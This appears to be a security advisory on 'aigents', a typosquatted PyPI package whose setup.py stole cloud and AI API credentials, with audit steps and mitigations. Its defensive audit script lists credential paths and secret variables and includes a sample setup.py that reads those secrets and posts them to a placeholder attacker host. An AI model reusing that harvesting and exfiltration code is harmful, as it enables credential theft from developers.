Malicious PyPI Package 'aigents' Steals Cloud Credentials from AI Developers
Overview
A malicious package named `aigents` was discovered on the Python Package Index (PyPI), targeting AI and machine learning developers through typosquatting. The package mimicked the name of a legitimate but less common AI orchestration tool, tricking developers into installing it. Upon installation via `pip install aigents`, a malicious `setup.py` script was executed. This script scanned the host system for common locations of sensitive files, including `~/.aws/credentials`, `~/.gcp/credentials.json`, and environment variables like `OPENAI_API_KEY` and `HUGGING_FACE_TOKEN`. If found, these credentials were exfiltrated over HTTPS to an attacker-controlled server. The package's author added seemingly legitimate but non-functional boilerplate code related to AI agents to mask its true purpose. The attack was discovered after a developer noticed unexpected network traffic originating from their CI/CD pipeline shortly after adding the dependency. This incident highlights the significant supply chain risk within the rapidly growing AI ecosystem, where developers frequently install numerous open-source packages. The impact is critical, as stolen credentials can be used to compromise cloud infrastructure, access and exfiltrate sensitive data, train malicious models on the victim's GPU resources, and mount further attacks.
Affected Systems
Testing Guide
1. **Review Dependency Tree:** Run `pip list` or `poetry show --tree` in your project's virtual environment to inspect all installed packages, including transitive dependencies.
2. **Check for Suspicious Packages:** Carefully examine the list for packages with names that seem misspelled, have very few downloads on PyPI, or lack a credible source repository.
3. **Audit Installation Scripts:** If you suspect a package, download its source distribution (`.tar.gz`) from PyPI and manually inspect the `setup.py` or `pyproject.toml` files for any obfuscated or suspicious code that runs at installation time (e.g., network requests, file system access).
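The audit in step 3 can be partly automated. The following is an added example, not code from the advisory or from PyPI: a small standard-library triage script that parses a `setup.py` source text and flags install-time behaviour that has no business in a build script (network calls, reads of the credential paths and environment variables named above, and exec/decode primitives). The sample `setup.py` it is run against is constructed for illustration; the call names and the `[attacker-placeholder]` host are assumptions.

```python
import ast

# Indicators taken from the advisory: files and variables the 'aigents' script went after.
SENSITIVE_PATHS = (".aws/credentials", ".gcp/credentials.json")
SENSITIVE_ENV = ("OPENAI_API_KEY", "HUGGING_FACE_TOKEN")
NETWORK_CALLS = ("urlopen", "urlretrieve", "post", "get", "request", "create_connection")
DANGEROUS_CALLS = ("exec", "eval", "b64decode", "system", "Popen")

def _dotted_name(node):
    # Rebuild 'a.b.c' from a Name/Attribute chain (e.g. urllib.request.urlopen); None otherwise.
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        return ".".join(reversed(parts + [node.id]))
    return None

def audit_setup_source(src: str) -> list[str]:
    # Return human-readable findings for install-time behaviour a setup.py should not have.
    findings = []
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func) or ""
            leaf = name.rsplit(".", 1)[-1]
            if leaf in NETWORK_CALLS and any(m in name for m in ("http", "request", "socket")):
                findings.append(f"network call: {name}")
            elif leaf in DANGEROUS_CALLS:
                findings.append(f"dangerous call: {name}")
            elif name == "os.getenv" or name.startswith("os.environ"):
                findings.append(f"environment read: {name}")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if any(p in node.value for p in SENSITIVE_PATHS):
                findings.append(f"credential path: {node.value}")
            if node.value in SENSITIVE_ENV:
                findings.append(f"env secret: {node.value}")
    return findings

# Constructed sample mirroring the behaviour the advisory describes; not the real package's code.
SAMPLE_SETUP_PY = '''
import os, urllib.request
from setuptools import setup
loot = {k: os.environ.get(k) for k in ("OPENAI_API_KEY", "HUGGING_FACE_TOKEN")}
for p in ("~/.aws/credentials", "~/.gcp/credentials.json"):
    loot[p] = open(os.path.expanduser(p)).read()
urllib.request.urlopen("https://[attacker-placeholder]/c", data=str(loot).encode())
setup(name="aigents", version="0.1.0")
'''
```

A clean `setup.py` that only calls `setup()` produces no findings, so the function can gate a CI step that fails when a newly added dependency's sdist trips any of these checks; it is a triage aid for the manual review, not a replacement for it.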
Mitigation Steps
1. **Verify Package Names:** Before installing any package, double-check its name for typos and verify its authenticity on PyPI by checking its download statistics, release history, and linked GitHub repository.
2. **Use Locked Dependencies:** Use dependency management tools like `Poetry` or `pip-tools` to create a `lock` file (`poetry.lock`, `requirements.txt`) that pins exact, vetted versions of dependencies.
3. **Scan Dependencies:** Integrate automated dependency scanning tools like `pip-audit` or Snyk into your development and CI/CD workflows to detect known malicious or vulnerable packages.
4. **Principle of Least Privilege:** Use short-lived credentials and IAM roles with the minimum necessary permissions for development and deployment, limiting the impact of a potential credential leak.
Patch Details
The malicious package 'aigents' was removed from the PyPI repository by the Python Software Foundation security team on 2025-11-06.